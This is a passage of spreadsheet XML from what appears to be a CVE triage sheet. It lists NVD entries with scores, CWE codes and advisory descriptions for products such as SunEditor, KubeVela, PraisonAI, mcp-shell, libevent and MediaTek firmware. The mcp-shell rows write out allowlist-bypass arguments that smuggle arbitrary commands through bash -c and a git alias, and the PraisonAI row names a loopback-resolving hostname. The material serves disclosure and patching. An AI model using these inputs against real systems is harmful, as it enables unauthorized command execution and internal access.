          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87633</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12858</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>security@eset.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>Improper Privilege Management vulnerability in ESET AV Remover (standalone) allows Privilege Escalation via especially crafted RPC.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12858</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54606</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>SunEditor is a lightweight and powerful WYSIWYG editor in vanilla JavaScript with no dependencies. Prior to 3.1.4, the SunEditor Embed plugin in src/plugins/modal/embed.js parses attacker-controlled raw embed HTML with DOMParser and processes the resulting DOM nodes. When an external script element follows a valid iframe, the plugin recreates a script element from the attacker-controlled src attribute and appends it to the live DOM, causing JavaScript execution in the editor page. If an application stores or reflects SunEditor content without additional backend sanitization, an attacker who can submit embed HTML can trigger stored or reflected cross-site scripting when another user opens, previews, renders, or edits the content, enabling access to page data and account actions as the victim. This issue is fixed in version 3.1.4.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54606</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55108</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-59</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>KubeVela is an open source application delivery platform. Prior to 1.9.14, from 1.10.0-alpha.1 until 1.10.9, and from 1.11.0-alpha.1 until 1.11.0-alpha.4, the Terraform remote configuration loader in pkg/controller/utils/capability.go, GetTerraformConfigurationFromRemote, clones a repository supplied through a core.oam.dev/v1beta1 ComponentDefinition and follows repository-controlled variables.tf or main.tf symlinks. A user with permission to create or update ComponentDefinition objects can point variables.tf to /dev/zero through terraform.path, after which os.Stat and os.ReadFile follow the link and read an unbounded stream before ParseTerraformVariables or HCL parsing can reject the content. The read can exhaust memory, OOM-kill the cluster-wide vela-core controller, cause repeated Pod restarts, and pressure node memory when no effective container limit is configured. This issue is fixed in versions 1.9.14, 1.10.9, and 1.11.0-alpha.4.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55108</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55526</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-350, CWE-918</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, spider_tools._host_is_blocked() does not resolve ordinary hostnames before scrape_page fetches them. A hostname such as 127.0.0.1.nip.io passes validation and resolves to loopback, permitting internal HTTP access. The fix uses socket.getaddrinfo and fails closed on DNS errors. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55526</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77974</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>After spoofing the device and obtaining one user confirmation, an attacker may be able to cause the application to transmit firmware through an unauthenticated and unsigned update channel.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77974</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-12737</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>ed10eef1-636d-4fbe-9993-6890dfa878f8</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>wso2:api_control_plane, wso2:api_manager, wso2:identity_server, wso2:identity_server_as_key_manager, wso2:open_banking_am, wso2:open_banking_iam, wso2:traffic_manager, wso2:universal_gateway</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>The administrative operations within the Carbon Console do not adequately validate specific user-supplied input. This oversight allows a malicious actor with administrative privileges to inject and execute arbitrary code remotely.
Successful exploitation enables a threat actor with administrative privileges and Carbon Console access to execute remote arbitrary code through specific administrative operations, leading to a complete compromise of the affected system.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-12737</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20501</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9197.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20501</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20502</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2718, mediatek:mt2718_firmware, mediatek:mt6580, mediatek:mt6580_firmware, mediatek:mt6739, mediatek:mt6739_firmware, mediatek:mt6761, mediatek:mt6761_firmware, mediatek:mt6765, mediatek:mt6765_firmware</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11262030; Issue ID: MSV-9196.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20502</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52491</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the libtiff/tools/thumbnail.c: main() component</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52491</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63388</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-787</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a heap out-of-bounds write in bufferevent_sock.c when bufferevent_socket_set_conn_address_ copies a kernel-supplied AF_UNIX peer address into bufferevent_private.conn_address. Release builds compiled with NDEBUG disable the EVUTIL_ASSERT length guard, and the evhttp accept path can pass a 110-byte sockaddr from accept() into the 28-byte field. An unauthenticated local peer able to connect to an AF_UNIX listener can overwrite the adjacent dns_request pointer and heap data, causing memory corruption with confidentiality, integrity, and availability impact. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63388</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71612</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the nhntdmx_process() function. Fixed in fac50e6a12ac27ffabdd5d3080b51afcc44ad8d6.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71612</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71614</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
